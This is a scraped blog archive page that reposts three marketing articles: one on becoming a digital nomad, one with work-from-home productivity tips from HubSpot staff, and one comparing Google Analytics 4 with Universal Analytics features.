Microsoft Archives - Page 44 of 57

What Is a Digital Nomad and How Do You Become One?

In the Cascade Mountains of Southern Oregon, there sits a volcano with no peak. But what takes the place of a billowing summit isn’t a barren crater — it’s an electric blue lake, surrounded by pine trees and the jagged remains of the volcano’s collapsed mouth, which crumbled during an eruption almost 8,000 years ago.

This place is called Crater Lake. It’s considered one of the most beautiful national parks in the United States. It’s also where Justin Champion, a Content Professor at HubSpot Academy, spent his work day last Thursday.https://www.instagram.com/p/BkTxa6cHCjr/embed/captioned/?cr=1&v=8&wp=648&rd=https%3A%2F%2Fblog.hubspot.com&rp=%2Fmarketing%2Fdigital-nomad#%7B%22ci%22%3A0%2C%22os%22%3A1813.1999999999534%2C%22ls%22%3A1638.5%2C%22le%22%3A1770.9000000001397%7D

A striking landscape, like Crater Lake, is a normal office view for Justin and his wife, Ariele. After working in the National Park, they headed north to Portland and spent a day in Mt. Hood. Then, they drove through Redwood National Park. And next week, they plan to work in Yosemite National Park.

Justin and his wife have been living, working, and traveling across America in a Ford F-250 with an Airstream trailer hitched to its back for the past two years. And their alternative lifestyle has helped them prioritize life experiences and close connections over material possessions. They’re modern day nomads. Or what most people call digital nomads.

What is a Digital Nomad?

Digital nomads are remote workers who usually travel to different locations. They often work in coffee shops, co-working spaces, or public libraries, relying on devices with wireless internet capabilities like smart phones and mobile hotspots to do their work wherever they want.

With 34% of remote employees working 4-5 days a week out of the office, the digital nomad lifestyle could be an exciting possibility if you’ve caught the travel bug and want to break free from the shackles of 9-5 life. Below, we’ll cover the benefits, job opportunities, and realities of this alternative lifestyle.

Let’s find out if it’s the right fit for you.

Living the Dream? 5 Benefits of Being a Digital Nomad

1. You’ll be more productive.

There’s no time to waste when you travel to gorgeous places almost every day. Exploring your new surroundings will motivate you to get your work done as soon as possible. Adventure can be one of the best types of motivation.

2. You’ll have more breakthrough ideas.

Creativity happens when you mash seemingly unrelated concepts together to form a new idea. Neuroscientists call this synaptic play, and the more incongruent the concepts are, the more synapses occur in your brain. Working in a different place everyday gives you a lot of diverse experiences that you call pull from to make these creative connections. And when your brain is chock full of these diverse inputs, your ideas are much more inventive.

3. You’ll become more adaptable.

Constantly traveling to new places pushes you out of your comfort zone. And to adapt to new environments everyday, you need to be willing to engage with different people and cultures. This makes you more open to new experiences in the future.

Traveling also improves your brain’s reaction to change. When you travel, the stress of navigating a foreign place sprouts dendrites in your brain. These dangling extensions increase your brain’s capacity and attentiveness during new and challenging situations in the future.

In a nutshell, traveling strengthens your desire and ability to learn new skills.

4. You’ll have more time to do the things you love.

Even though work can be great, we still work to live, not the other way around. Finishing work faster gives you more time in your schedule to explore your surroundings, do the things you’re passionate about, and spend more time with loved ones.

5. You’ll make lifelong friendships.

Adventure and memorable experiences forge close connections between people. When you embark on your journey, you’ll meet other digital nomads and become friends with them. And if you travel with a friend or significant other, your relationship will be closer than ever before.

Common Jobs for Digital Nomads

Today, most companies embrace remote work. 43% of American employees spent time working remote last year, and this number will only increase. But being a digital nomad and working a few days at home are two different animals. If you want to keep your day job while traveling, you need to prove to your manager that you can handle full-time remote work before you can do work on the road. Justin Champion decided to work remotely for six months before he even asked to travel.

If you’re looking for job, sift through sites that only list remote jobs, like We Work Remotely or Remote.co, and ask prospective employers if the role lends itself to your nomadic lifestyle.

Freelancing is also a common role for digital nomads. Before you embark on your journey, though, you must be realistic with yourself. How will you be able to make a living? Answer the following questions to help you figure this out:

What am I good at?
What do I like to do?
Is there a need for my skill?
Can I do this job online?

Once you know how you’ll be able to make money, you can enter the gig economy by marketing and selling your services on your own, or finding work on a freelance service marketplace like Upwork or Fiverr.

Whether you chose to work for a company or yourself, becoming a digital nomad doesn’t mean pigeonholing yourself in a specific role. Your job just has to be fully digital. Listed below are some common roles that lend themselves well to a fully remote lifestyle:

Accounting
Customer Service
Design
Editing
Healthcare
IT
Marketing
Project Management
Quality Analyst (QA)
Recruiting & HR
Sales
Software Development
Teacher/Tutor
Transcription
Virtual Assistant
Writing

As you can see, there’s a lot of different industries and roles for digital nomads. Remote work is becoming commonplace, which is exciting and beneficial for the workforce. But that doesn’t mean anyone and everyone should be a digital nomad. It’s still a tough challenge. You need to be organized and disciplined, or you won’t be able to enjoy your travels — which is the point of the lifestyle, right? So how do you set yourself up for success?

How Do You Become a Digital Nomad? 5 Things to Consider Before You Get Started

1. Get rid of unnecessary expenses.

Paying for things that don’t greatly impact your life is never ideal. That’s why you need to get rid of all the expenses that you won’t need living as a digital nomad. Things like gym memberships, subscriptions, and debt are all expenses that’ll bog you down on the road. And if you’re a freelancer, they’ll be even more of a burden because you might experience some periods of inconsistent income. Getting rid of these expenses and paying off debt will allow you to fully focus on your work and travels.

2. Make sure you have income you can rely on for months in advance.

Whatever lifestyle you pursue, it’s always smart to have safety net. You never know when an emergency will arise. This rings especially true when you’re a digital nomad because you’re mostly own your own. You can’t find solace in a warm, comfortable home or family, and if you’re freelancer, you don’t have the luxury of a consistent paycheck. To widen your safety net, you should sell any unnecessary belongings, move the essentials into a storage unit, sell or rent your house, and save as much money as possible.

3. Get travel health insurance.

Traveling can give you some of the best experiences in your life, but it not always a blissful, perpetual highlight reel. It’s still real life. You’ll get sick, have emergencies and accidents, and need regular checkups. You also need immunizations to enter certain parts of the world. Your health should be your number one priority during your travels, so make sure you buy a solid health insurance plan that’s valid in all the places you visit.

4. Set yourself up for financial success.

Ample funds are the key to successful travel. American credit cards will usually charge you a fee if you use it abroad, so ask your bank for an international credit card. You should also sign up for credit monitoring services that’ll alert you if anyone tries to steal your identity.

5. If you travel internationally, unlock your phone.

Most countries have different cell phone carriers, so if you want to bounce from country to country, you need to call your current carrier and ask them to unlock your phone. You’ll be able to use your phone in any country because you can put a different sim card in your phone from each international carrier you use.

Once you square these things away, it’s time to start your new life on the road. But actually living life as a digital nomad is an entirely different ballgame than preparing to be one.

7 Tips for Living as a Digital Nomad

1. Make a budget.

As a digital nomad, your budget should be your bible. And if you follow it, you can live quite comfortably. To create a successful budget, calculate your living expenditures, the cost of traveling to each destination, staying there, the activities you’ll do there, the costs of working, and how it all affects your savings if you can’t earn a salary for a while.

2. Plan for the worst-scenario.

When you live abroad, It’s crucial to have multiple backup plans in case of any emergencies. Nothing really ever works out the way it’s supposed to. Things happen. What if your truck breaks down? Or what if you get stuck in a foreign country with no backup plan? What’s your plan B and C? You need to set these processes in place to handle the inevitable bumps in the road.

3. Join a digital nomad community.

Digital Nomad communities like Couchsurfing and Nomadlist will help you learn the nuances of the digital nomad lifestyle, and reduce its steep learning curve. Fellow nomads will be happy to answer any pressing questions about your new lifestyle and any areas you plan to visit. They’ll also teach you how to work effectively on the road. And arguably the most beneficial perk of these communities is that you can connect with other traveling professionals, which can lead to new business opportunities, partnerships, and friendships.

4. Make sure you have cell reception or wifi.

If your employer lets you work remotely, show them and your team some respect by being available as much as possible online. Not having wifi or cell phone reception should never be an excuse for missing a meeting or failing to get an assignment done. The same goes for client work, if you’re a freelancer.

To make sure you’ll always have internet connection, consider investing in a cell phone booster and a mobile hotspot mifi device. Cell phone boosters can detect the smallest shred of cell phone reception and send the signal to your vehicle. Mobile hotspot mifi devices strengthen your mobile hotspot service, so you don’t have to rely on a spotty, public wifi connection.

5. Make sure you can communicate with locals.

Knowing the language of the country you’re going to or knowing that they speak your language is crucial for successful travel. Assuming that there has to be someone who will understand English is a dangerous move. But if you must go to a place where you don’t know the native language or they don’t speak yours, use Google Translate or another translation app to navigate your new environment.

6. Research your destinations.

If you’re not living in an RV, find affordable housing on AirBnB or Couchsurf before you arrive to your destination. And make sure your lodging is near a hospital, emergency room or clinic in case of an emergency. You should also research the area to find safe neighborhood to stay in.

7. Draw cash from ATMs.

Airports are notorious for charging ridiculously high currency exchange fees. If you need cash, draw it from an ATM. Your bank will charge you a fee, but it’ll be much lower than the one at the currency exchange desk.

Before you set off …

If an adventurous lifestyle sounds appealing to you, then being a digital nomad can be one of the most rewarding yet challenging ways to live. But if you arm yourself with organization, discipline, and a thirst for learning, you could enjoy an exciting and fulfilling life on the road. Just ask Justin and Ariele Champion. They’re living the alternative American Dream. And they’ve never looked back.

Source :
https://blog.hubspot.com/marketing/digital-nomad

How to Work From Home: 24 Tips From People Who Do It Successfully

Working from home is awesome, right up until the cat throws up on your computer. And your neighbor, who you can only assume is building a time machine, starts firing up all sorts of power tools and noisy machinery across the street.

COVID-19 has caused remote work to become a necessity instead of a luxury for many professionals. But which environment allows us to be more productive: the home office or the office office?

In the office office, your colleagues often pose the greatest threat to keeping you from getting some real, heads-down work done. They drop by your desk, engage you in conversation, and invite you to lunch — or so I hear. The social benefits are nice to have, but they can become a challenge if you’re easily distracted.

However, at the home office, while family members can be a distraction, I find that it’s easy for you to become your own worst enemy. Because without coworkers around, you’re free to drop those pesky inhibitions. At the home office, no one’s watching. You don’t necessarily feel that same peer pressure or communal obligation to get stuff done. (Also, you don’t have to wear pants.)

Download Now: How to Be More Productive at Work [Free Guide + Templates]

Below, I’ve compiled many great work-at-home tips and tricks from some of my awesome coworkers.

How to Work From Home

Communicate expectation with anyone who will be home with you.
Take clear breaks.
Interact with other humans.
Prepare meals the night before.
Pick a definitive finish time.
Eat and sleep.
Talk to your employer.
Join a remote-friendly company.
Start a career as a freelancer.
Start a home business.

1. Communicate expectations with anyone who will be home with you.

Of course, you might be working from home but still have “company.” Make sure any roommates, family members, and dogs (well, maybe not dogs) respect your space during work hours. Just because you’re working from home doesn’t mean you’re home.

If you share space with another work-from-home adult, you may have to lay ground rules about meeting times, shared desks and chairs, and quiet times.

CEO Sam Mallikarjunan tells how he manages to get work done even when people are around.

“If anyone else is going to be at home when you’re working, they just have to be clear that when you’re in your ‘office’ (in my case, my signal to the family is having headphones on), you’re working — even if it looks like and feels like you’re hanging out at home.”

He continues, “It’s easy to get distracted by the many things that have to be done around the house during the day.”

2. Take clear breaks.

It can be so easy to get distracted as a telecommuter that you avoid breaks altogether. Don’t let the guilt of working in the building you sleep in prevent you from taking five minutes to relax.

However rather than just opening YouTube and watching some comfort clips, use your breaks to get away from your desk. Go for a walk, enjoy fresh air, or spend time with others who might also be in the house.

Take Ginny Mineo‘s advice. “Breaks, like making and eating lunch, can recharge you to do better work. Don’t assume you need to be working 100% of the time while you’re home to be more productive.”

3. Interact with other humans.

When your office starts working from home, you’ll likely miss the casual social interactions with colleagues you’re used to throughout the day. When working from home, you don’t have the small talk and other activities that make each day at the office unique.

So what can you do? Communicate.

Fight boredom and loneliness by frequent communication with other employees. Reach out to them through video chat via apps like Zoom and Slack, a hosted phone system, or however else your company communicates.

Remember: You’re working from home, not the moon. Interacting with other people during the day is allowed, even if they’re not your colleagues. It’s a good idea to see another face during the day when most of your workday is solitary. So, use your breaks to interact with others.

“Go outside and find a human to interact with — ordering your coffee, running an errand, whatever. It keeps you sane.”
– Corey Wainwright

4. Prepare meals the night before.

When you’re in your own home, it can be tempting to spend time preparing a nice breakfast and lunch for yourself, chopping and cooking included. Don’t use precious minutes making your food the day of work — cook it the night before.

Preparing food ahead of time ensures you can use your meal times to eat and that you aren’t performing non-work tasks that spend energy better used at your desk.

Digital marketing strategist, Lindsay Kolowich, adds, “Cooking at home is time you wouldn’t have spent meal prepping if you’d been in the office that day, and I find the minutes can add up in the end. To mitigate that, I try to cook and prep my meals the night before, just like I would for a day at the office.“

5. Pick a definitive finishing time.

You might be under the impression that working from home establishes more work-life balance, but be careful with that assumption.

Working from home can also feel like being at a casino — you can get so caught up in your activity, in a relaxing environment, that you lose complete track of time.

“If you work from home full-time (or regularly), it’s really easy to let your work life bleed into your personal life,” says Tyler Littwin.

He continues, “Maintaining a boundary is important for both halves of the equation.”

In lieu of coworkers, whose packing up and leaving the office reminds you to do the same, set an alarm at the end of the day to indicate your normal workday is coming to an end. You don’t have to stop at exactly that time, but knowing the workday is technically over can help you start the process of saving your work and calling it quits for the evening.

6. Eat and sleep.

What is the biggest perk to working from home? One of the biggest benefits for some people (me), is complete access to the kitchen.

As soon as I take a break, I automatically drift towards the kitchen for some snacks.

An unhealthy diet can affect productivity and drain energy. When I switched to a healthier diet, it made me function better and get the most from my routine.

So eat well when working from home.

It’s also vital that you keep to a proper sleep schedule. Save binge-watching your favorite shows for the weekend. With the right food to keep energy levels high and sound sleep to refresh your body and mind, you can make a success of working from home.

7. Talk to your employer.

If you like your current job and don’t want to change it, the obvious step is to find a way to pivot the position.

One of the tips for doing this is folding the possibility of going remote into your next promotion cycle. Talk to your boss often about your intention to pivot.

And, if you’re not sure your employer will agree to working completely remotely, talk about the option of working remotely one or two days a week. When you use the work from home tips we’ve provided above, and your boss sees how productive you are, they could allow you more days to work from home.

8. Join a remote-friendly company.

If your work can be done remotely, but your current boss or organization doesn’t allow you to work from home, you might need to get a new job.

When looking for a work-from-home job, you can use the same methods you used in finding your regular office job. This includes channels like job sites, local job ads, and social media platforms.

Job sites that list work from home ads include:

Some remote-friendly firms include:

Check out these firms to see whether you meet the requirements to start working remotely for them.

9. Start a career as a freelancer.

If your current job isn’t remote work-friendly, you can go remote by starting your own business as a freelancer or a consultant.

Depending on the nature of your current job, you may start your own freelance business while still being employed.

The benefit of starting your freelance business while still employed is that it reduces the financial strain experienced by any new business.

10. Start a home business.

Starting a home business is one way to enjoy remote work.

Unlike other fields, certifications and education are not usually prerequisites. Instead, researching, having a smart business plan, and choosing the right business is more essential to the success of your business.

You can find more work-from-home tips in the books listed in this best remote work books article.

Working From Home Tips

Get started early.
Pretend like you are going into the office.
Structure your day like you would in the office.
Choose a dedicated workspace
Don’t stay at home.
Make it harder to use social media.
Commit to doing more.
Work when you’re at your most productive.
Save calls for the afternoon.
Focus on one distraction.
Plan out what you’ll be workign on ahead of time.
Use technology to stay connected.
Match your music to the task at hand.
Use laundry as a work timer.

1. Get started early.

When working in an office, your morning commute can help you wake up and feel ready to work by the time you get to your desk. At home, however, the transition from your pillow to your computer can be much more jarring.

Believe it or not, one way to work from home productively is to dive into your to-do list as soon as you wake up. Simply getting a project started first thing in the morning can be the key to making progress on it gradually throughout the day. Otherwise, you’ll prolong breakfast and let the morning sluggishness wear away your motivation.

Lindsay Kolowich says, “When I work from home, I wake up, put on a pot of coffee, and start working immediately — much earlier than normal working hours. I only start making breakfast once I’ve hit a wall or need a break. I’m a morning person and find I can get a ton done in the early morning hours, so this works really well for me.”

2. Pretend like you are going into the office.

The mental association you make between work and an office can make you more productive, and there’s no reason that feeling should be lost when working remotely.

I know that you love working in your pajamas (I do, too), but the mere act of changing clothes to something more serious will give you a signal to get work done throughout the day.

When you dress up, you give your brain a reason for dressing up, and it can keep you pumped throughout your work hours.

So when working from home, do all the things you’d do to prepare for an office role: Set your alarm, make (or get) coffee, and wear nice clothes.

Internet browsers like Google Chrome even allow you to set up multiple accounts with different toolbars on the top — for example, a toolbar for home and a separate toolbar for work.

Take to heart the words of HubSpot graphic designer, Anna Faber-Hammond, who says, “Get fully ready for the day and pretend you’re actually going to work. Otherwise, you might find yourself back in bed.”

3. Structure your day like you would in the office.

When working from home, you’re your own personal manager and can choose your working hours.

However, without things like an in-person meeting schedule to break up your day, you can easily lose focus or burn out.

To stay on schedule, segment what you’ll do and when for the day. If you have an online calendar, create personal events and reminders that tell you when to shift gears and start on new tasks. Google Calendar makes this easy.

Structuring your day as you would in the office also saves you from work creep. With this structure in place, working from home will not cause your work to invade your personal life.

“Are mornings for writing while you’re in the office? Use the same schedule at home. This structure will help keep you focused and productive.” – Ginny Mineo

4. Choose a dedicated workspace.

Just because you’re not working at an office doesn’t mean you can’t, well, have an office. Rather than cooping yourself up in your room or on the couch in the living room — spaces associated with leisure time — dedicate a specific room or surface in your home to working remotely.

No matter the space or location, have an area of the home to work and stay committed to throughout the day. And, after choosing your dedicated workspace, make the most of it by making it quiet.

CEO, Sam Mallikarjunan says, “Have a place you go specifically to work. It could be a certain table, chair, local coffee shop — some place that’s consistently your ‘workspace.’ It helps you get into the right frame of mind.”

5. Don’t stay at home.

Is your home office just not getting it done for you? Take your work-from-home life a step further and get out of the house. Coffee shops, libraries, public lounges, and similar Wi-Fi-enabled spaces can help you simulate the energy of an office so you can stay productive even when you don’t sit in an official workplace.

Content marketer, Corey Wainwright, comments, “I get out of my home to work and go to an establishment with actual tables, chairs, and people. It helps simulate the work environment and removes the distractions I typically have at home, like the urge to finally clean my room, do laundry, or watch TV. “

6. Make it harder to use social media.

Social media is designed to make it easy for us to open and browse quickly. As remote workers, though, this convenience can be the detriment of our productivity.

To counteract your social networks’ ease of use during work hours, remove them from your browser shortcuts and log out of every account on your phone or computer.

You might even consider working primarily in a private (or, if you’re using Chrome, an “Incognito”) browser window. This ensures you stay signed out of all your accounts, and each web search doesn’t autocomplete the word you’re typing. It’s a guarantee that you won’t be tempted into taking too many social breaks during the day.

Also, many have found it helpful to shut off social media notifications during the hours they work from home.

Alec Biedrzycki, product marketer at AirTable, says, “I remove all social networks from my toolbar bookmarks… you can get sucked in without knowing it, so eliminating the gateway to those networks keeps me on track.”

7. Commit to doing more.

Projects always take longer than you initially think they will. For that reason, you’ll frequently get done less than you set out to do.

So, just as you’re encouraged to overestimate how much work hours you’ll spend doing one thing, you should also overestimate how many things you’ll do during the day.

Even if you come up short of your goal, you’ll still come out of that day with a solid list of tasks filed under ‘complete.’

“On days I’m working from home, I tend to slightly overcommit on what I’ll deliver that day. So even if I get the urge to go do something else, I know I’ve already committed a certain amount of work to my team.”- Corey Wainwright

8. Work when you’re at your most productive.

Nobody sprints through their work from morning to evening — your motivation will naturally ebb and flow throughout the day. However, when you’re working from home, it’s all the more important to know when those ebbs and flows will take place and plan your schedule around it.

To capitalize on your most productive periods, save your more challenging tasks for when you know you’ll be in the right headspace for them. Use slower points of the day to knock out the easier logistical tasks on your plate.

Verily Magazine calls these tasks “small acts of success,” and they can help build your momentum for the heavier projects that are waiting for you later on.

Product designer, Brittany Leaning, says about her routine, “For me, the most productive times of the day are usually early in the morning or late at night. I recognize this and try to plan my day accordingly. Also, music that pumps me up doesn’t hurt.”

The responsibility is on you to know when you are most productive and build your work schedule around the periods of maximum productivity.

9. Save calls for the afternoon.

Sometimes, I’m so tired in the morning, that I don’t even want to hear my voice — let alone talk to others with it.

You shouldn’t have to give yourself too much time to become productive in the morning, but you can give yourself some extra time before working directly with others.

If you’re struggling to develop a reasonable work schedule for yourself as a telecommuter, start with the solitary tasks in the morning.

Save your phone calls, meetings, Google hangouts meetings, video call, and other collaborative work for when you’ve officially “woken up.”

Senior Marketing Director, James Gilbert, advises that you “Take advantage of morning hours to crank through meaty projects without distractions, and save any calls or virtual meetings for the afternoon.”

10. Focus on one distraction.

There’s an expression out there that says, “if you want something done, ask a busy person.”

The bizarre but true rule of productivity is that the busier you are, the more you’ll do.

It’s like Newton’s law of inertia: If you’re in motion, you’ll stay in motion. If you’re at rest, you’ll stay at rest. And busy people are in fast-enough motion that they have the momentum to complete anything that comes across their desk.

Unfortunately, it’s hard to find things to help you reach that level of busyness when you’re at home — your motivation can just swing so easily. HubSpot’s principal marketing manager, Pam Vaughan, suggests focusing on something that maintains your rhythm (in her case, it’s her daughter).

She says, “When I work from home, my 20-month-old daughter is home with me, too. It seems counterintuitive, but because I have to manage taking care of her and keeping her happy and entertained while still getting my work done, the pressure helps to keep me focused. When she’s napping or entertaining herself, I go into super-productive work mode.

The ‘distraction’ of my daughter (I mean that in the most loving way possible) means I can’t possibly succumb to some of the other common distractions of home.”

11. Plan out what you’ll be working on ahead of time.

Spending time figuring out what you’ll do today can take away from actually doing those things. And, you’ll have planned your task list so recently that you can be tempted to change your schedule on the fly.

It’s important to let your agenda change if you need it to, but it’s equally important to commit to a schedule that outlines every assignment before you begin.

Try solidifying your schedule the day before, making it feel more official when you wake up the next day to get started on it.

“Plan out your week in advance to optimize for the environments you’ll be in.”- Niti Shah

12. Use technology to stay connected.

Working from home might make you feel cut off from the larger operation happening in your company.

Instant messaging and videoconferencing tools like Slack and Zoom can make it easy to check in with other remote employees and remind you how your work contributes to the big picture.

It’s also vital to invest in the right technology. For instance, a bad-performance router can take the steam right off your enthusiasm to work, so it’s better to invest in a high-performance router.

CMO and former HubSpot employee, Meghan Keaney Anderson, remarks, “At HubSpot, we use Slack to keep conversations going remotely, Trello to keep us organized around priorities, and Google Hangouts plus Webex to make remote meetings more productive. Getting the right stack of support tools to fit your work style makes a big difference.”

13. Match your music to the task at hand.

During the week, music is the soundtrack to your career (cheesy, but admit it, it’s true). And at work, the best playlists are diverse playlists — you can listen to music that matches the energy of the project you’re working on to boost your productivity.

Video game soundtracks are excellent at doing this. In the video game, the lyric-free music is designed to help you focus; it only makes sense that it would help you focus on your work.

Want some other genres to spice up your routine and make you feel focused? Take them from startup marketer, Ginny Mineo, who offers her work music preferences below.

“When I’m powering through my inbox, I need some intense and catchy rap/R&B (like Nicki Minaj or Miley Cyrus) blasting through my headphones, but when I’m writing, Tom Petty is the trick. Finding what music motivates and focuses me for different tasks (and then sticking to those playlists for those tasks) has completely changed my WFH productivity.”

14. Use laundry as a work timer.

You might have heard that listening to just two or three songs in the shower can help you save water. And it’s true; hearing a few of your favorite songs start and end, one after another, can remind you how long you’ve been in the bathroom and shorten your wash time.

Why bring this up? Because the same general principle can help you stay on task when working from home. But instead of three songs off your music playlist, run your laundry instead.

Doing your laundry is a built-in timer for your home. So, use the time to start and finish something from your to-do list before changing the load.

Committing to one assignment during the wash cycle and another during the dry process can train you to work smarter on tasks that you might technically have all day to tinker with. And when you know there’s a timer, it makes it hard for distractions to derail your work.

People ops manager, Emma Brudner, notes, “I also usually do laundry when I work from home, and I set mini-deadlines for myself corresponding to when I have to go downstairs to switch loads. If I’m working on an article, I tell myself I’ll get to a certain point before the wash cycle ends. Then I set another goal for the dryer.”

Staying Productive While Working From Home

While you might miss the office, working full time from home can be good for you.

For one, you don’t have to worry about commuting every day and you can better care for your loved ones by being around more often.

The work from home tips that we have provided can help you make the most of your new routine. Try out a few and you might find that you’re just as productive working from home as you are in the office.

Source :
https://blog.hubspot.com/marketing/productivity-tips-working-from-home

Google Analytics 4 vs Universal Analytics: Full Comparison 2022

Do you want to know what’s new in Google Analytics 4? How is GA4 different from Universal Analytics?

There’s a lot that’s changed in the new Google Analytics 4 platform including the navigation. Google has added new features and removed a number of reports you’re familiar with. And that means we’ll need to relearn the platform.

In this guide, we’ll detail the differences between Google Analytics 4 (GA4) vs. Universal Analytics (UA) so that you’re prepared to make the switch.

If you haven’t already switched to Google Analytics 4, we have an easy step-by-step guide you can follow: How to Set Up Google Analytics 4 in WordPress.

What’s New Only in Google Analytics 4?

In this section, we’re detailing the things that are new in GA4 that aren’t present in Universal Analytics at all. A little later, we’ll go into depth about all the changes you need to know about.

Creating and Editing Events: GA4 brings about a revolutionary change in the way you track events. You can create a custom event and modify events right inside your GA4 property. This isn’t possible with Universal Analytics unless you write code to create a custom event.
Conversion Events: Conversion goals are being replaced with conversion events. You can simply mark or unmark an event to start tracking it as a conversion. There’s an easy toggle switch to do this. GA4 even lets you create conversion events ahead of time before the event takes place.
Data Streams: UA lets you connect your website’s URL to a view. These views let you filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports. GA4 uses data streams instead of views.
Data filters: Now you can add data filters to include or exclude traffic internal and developer traffic from your GA4 reports.
Google Analytics Intelligence: You can delete search queries from your search history to fine-tune your recommendations.
Explorations and Templates: There’s a new Explore item in the menu that takes you to the Explorations page and Template gallery. Explorations give you a deeper understanding of your data. And there are report templates that you can use.
Debug View: There’s a built-in visual debugging tool which is awesome news for developers and business owners. With this mode, you can get a real-time view of events displayed on a vertical timeline graph. You can see events for the past 30 minutes as well as the past 60 seconds.
BigQuery linking: You can now link your GA4 account with your BigQuery account. This will let you run business intelligence tasks on your analytics property using BigQuery tools.

While this is what’s unique to GA4, there are a lot more changes than this. But first, let’s take a look at what’s gone from the Universal Analytics platform that we’re all familiar with.

What’s Missing in Google Analytics 4?

Google Analytics 4 has done away with some of the old concepts. These include:

Views and Filters: As we mentioned, GA4 is not using Data Streams and we explain this in depth a bit later. So you won’t be able to create a view and related filters. Once you convert your UA property to GA4, you’ll be able to access a read-only list of UA filters under Admin > Account > All Filters.
Customization (menu): UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts. Below are the UA customization options, along with their GA4 equivalent.
- Dashboards: At the time of writing this, there isn’t a way to create a custom GA4 dashboard.
- Custom reports: GA4 has the Explorations page instead where you can create custom reports.
- Saved reports: When you create a report in Explorations, it is automatically saved for you.
- Custom alerts: Inside custom Insights, which is a new feature in GA4, you can set custom alerts.
Google Search Console linking: There isn’t a way to link Google Search Console with a GA4 property at the time of writing.
Bounce rate: One of the most tracked metrics – the bounce rate – is gone. It’s likely that this has been replaced with Engagement Metrics.
Conversion Goals: In UA, you could create conversion goals under Views. But since views are gone, so are conversion goals. However, you can create conversion events to essentially track the same thing.

Now that you know what’s new and what’s missing in GA4, we’ll take you through an in-depth tour of the new GA4 platform.

Google Analytics 4 vs Universal Analytics

Below, we’ll be covering the main differences between GA4 and UA. We’ve created this table of contents for you to easily navigate the comparison guide:

Feel free to use the quick links to skip ahead to the section that interests you the most.

New Mobile Analytics

A major difference between GA4 and UA is that the new GA4 platform will also support mobile app analytics.

In fact, it was originally called “Mobile + Web”.

UA only tracked web analytics so it was difficult for businesses with apps to get an accurate outlook on their performance and digital marketing efforts.

Now with GA4 data model, you’ll be able to track both your website and app. You can set up a data stream for Android and iOS.

There’s also added functionality to create custom campaigns to collect information about which mediums/referrals are sending you the most traffic. This will show you where your campaigns get the most traction so that you can optimize your strategies in the future.

Easy User ID Tracking

Turning on user ID tracking in UA was quite a task. But that’s all been simplified in GA4 with the new measurement model. You simply need to navigate to Admin » Property Settings » Reporting Identity tab.

You can choose between Blended and Observed mode. Select the one you want and save your changes. That’s it.

New Navigational Menu

In GA4, the reporting interface remains familiar and the navigation menu is still on the left! That keeps things familiar but there are quite a few menu items that have changed.

First, there are only 4 high-level menu items right now. Google may add more as the platform is further developed.

Next, each menu item has a collapsed view. You can expand each item by clicking on it.

Now when you click on the submenu items, it will expand the menu to reveal more sub menus.

In GA4, you’ll see familiar menu items you use for SEO and other purposes but in different locations. Here are the notable changes:

Realtime is under Reports
Audience(s) is under Configure
Acquisition is under Reports » Life cycle
Conversions is under Configure

GA4 also comes with completely new menu items as listed below:

Reports snapshot
Engagement
Monetization
Retention
Library
Custom definitions
DebugView

Measurement ID vs Tracking ID

Universal Analytics uses a Tracking ID that has a capital UA, a hyphen, a 7-digit tracking code followed by another hyphen, and a number. Like this: UA-1234567-1.

The last number is a sequential number starting from 1 that maps to a specific property in your Google Analytics account. So if you set up a second Google Analytics property, the new code will change to UA-1234567-2.

You can find the Tracking ID for a Universal Analytics property under Admin » Property column. Navigate to Property Settings » Tracking ID tab where you can see your UA tracking ID.

In GA4, you’ll see a Measurement ID instead of a Tracking ID. This starts with a capital G, a hyphen followed by a 10-character code.

It would look like this: G-SV0GT32HNZ.

To find your GA4 Measurement ID, go to Admin » Property » Data Streams. Click on a data stream. You’ll see your Measurement ID in the stream details after the Stream URL and Stream Name.

Data Streams vs Views

In UA, you could connect your website’s URL to a view. UA views are mostly used to filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports.

GA4 uses data streams instead. You’ll need to connect your website’s URL to a data stream.

But don’t be mistaken, they are not the same as views.

Also, you can’t create a filter in GA4. In case your property was converted from UA to GA4, then you can find a read-only list of UA filters under Admin » Account » All Filters.

Now Google defines a data stream as:

“A flow of data from your website or app to Analytics. There are 3 types of data stream: Web (for websites), iOS (for iOS apps), and Android (for Android apps).”

You can use your data stream to find your measurement ID and global site tag code snippet. You can also enable enhanced measurements such as your page views, scrolls, and outbound clicks.

In a data stream, you can do the following:

Set up a list of domains for cross-domain tracking
Create a set of rules for defining internal traffic rules
Put together a list of domains to exclude from tracking

Data streams will make a lot of things easier. But there are 2 things that you need to be aware of. First, once you create a data stream, there’s no way to edit it. And if you delete a data stream, you can’t undo this action.

Events vs. Hit Types

UA tracks data by hit types which is essentially an interaction that results in data being sent to Analytics. This includes page hits, event hits, eCommerce hits, and social interaction hits.

GA4 moves away from the concept of hit types. Instead, it’s event-based meaning every interaction is captured as an event. This means everything including page, events, eCommerce transactions, social, and app view hits are all captured as events.

There’s also no option for creating conversion goals. But GA4 lets you flag or mark an event as a conversion with the flip of a toggle switch.

This is essentially the same thing as creating a conversion goal in Universal Analytics. You can also create new conversion events ahead of time before those events actually take place.

In GA4, Google organizes events into 4 categories and recommends that you use them in this order:

1. Automatically collected

In the first event category, there’s no option to turn on any setting for tracking events so you don’t need to activate anything here. Google will automatically collect data on these events:

first_visit – the first visit to a website or Android instant app
session_start – the time when a visitor opens a web page or app
user_engagement – when a session lasts longer than 10 seconds or had 1 or more conversions or had 2 or more page views

Keep in mind that we’re only at the start of GA4. With Google’s ever-advancing and machine-learning technology, more automatically collected events may be added as the platform progresses.

2. Enhanced measurement

In this section, you don’t need to write any code but there are settings to turn on enhanced measurements. This will give you an extra set of automatically collected events.

To enable this data collection, you need to turn on the Enhanced measurement setting in your Data Stream.

Then you’ll see more enhanced measurement events that include:

page_view: a page-load in the browser or a browser history state change
click: a click on an outbound link that goes to an external site
file-download: a click that triggers a file download
scroll: the first time a visitor scrolls to the bottom of a page

3. Recommended

These GA4 events are recommended but aren’t automatically collected in GA4 so you’ll need to enable them if you want to track them.

We suggest you check out what is in the recommended events and turn on tracking for what you need. This can include signups, logins, and purchases.

Before we move to custom events, if you don’t see these 3 event types – automatically collected, enhanced measurement, and recommended – in your dashboard, you should ideally create a custom event for it.

4. Custom

Custom events let you set up tracking for any event that doesn’t fall into the above 3 categories. You can create and modify your events. So for instance, you can create custom events to track menu clicks.

You can design and write custom code to enable tracking for the event you want. But there is no guarantee that Google will support your custom metrics and events.

